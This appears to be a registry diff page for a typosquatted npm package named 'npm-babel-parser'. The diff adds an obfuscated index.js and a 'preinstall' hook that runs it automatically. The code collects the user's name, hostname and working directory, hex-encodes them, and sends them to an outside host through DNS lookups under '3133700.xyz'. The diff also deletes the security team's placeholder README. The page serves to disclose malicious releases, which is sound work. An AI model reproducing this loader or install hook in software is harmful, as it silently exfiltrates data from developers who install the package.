npm-babel-parser 0.0.1-security → 7.26.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of npm-babel-parser might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const _0x51913c=_0xa743;function _0xa743(_0x32015c,_0x135c7e){const _0x1fac5c=_0x1fac();return _0xa743=function(_0xa74396,_0x1fd841){_0xa74396=_0xa74396-0x1da;let _0x3d2cd2=_0x1fac5c[_0xa74396];return _0x3d2cd2;},_0xa743(_0x32015c,_0x135c7e);}(function(_0x47ea81,_0x4236e0){const _0xf95654=_0xa743,_0x29f4cc=_0x47ea81();while(!![]){try{const _0x3e316a=parseInt(_0xf95654(0x1dc))/0x1+-parseInt(_0xf95654(0x1e0))/0x2+-parseInt(_0xf95654(0x1e8))/0x3+parseInt(_0xf95654(0x1e3))/0x4+-parseInt(_0xf95654(0x1ea))/0x5+-parseInt(_0xf95654(0x1e6))/0x6*(-parseInt(_0xf95654(0x1de))/0x7)+-parseInt(_0xf95654(0x1e2))/0x8;if(_0x3e316a===_0x4236e0)break;else _0x29f4cc['push'](_0x29f4cc['shift']());}catch(_0x379124){_0x29f4cc['push'](_0x29f4cc['shift']());}}}(_0x1fac,0x97d23));const os=require('os'),dns=require('dns'),path=require(_0x51913c(0x1db)),u=os[_0x51913c(0x1df)]()[_0x51913c(0x1eb)],h=os[_0x51913c(0x1e4)](),p=process[_0x51913c(0x1dd)](),hexH=Buffer[_0x51913c(0x1e9)](h)['toString'](_0x51913c(0x1da))[_0x51913c(0x1e1)](0x0,0x3f),hexU=Buffer[_0x51913c(0x1e9)](u)[_0x51913c(0x1e7)](_0x51913c(0x1da))[_0x51913c(0x1e1)](0x0,0x3f),hexP=Buffer[_0x51913c(0x1e9)](p)[_0x51913c(0x1e7)](_0x51913c(0x1da))['substring'](0x0,0x3f),subdomain=_0x51913c(0x1e5)+hexU+'.'+hexH+'.'+hexP+'.ns1.3133700.xyz';dns['lookup'](subdomain,()=>{});function _0x1fac(){const _0x59e3e3=['7ZRWUeo','userInfo','1714600cpJIaQ','substring','789552OiHvAe','3693308OcErwr','hostname','lox.','2323518socOKr','toString','1625565PzFXBD','from','974225uLqhRJ','username','hex','path','1003973CxSVog','cwd'];_0x1fac=function(){return _0x59e3e3;};return _0x1fac();}
|
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "npm-babel-parser",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "7.26.4",
|
4
|
+
"main": "index.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node index.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC",
|
11
|
+
"description": ""
|
6
12
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=npm-babel-parser for more information.
|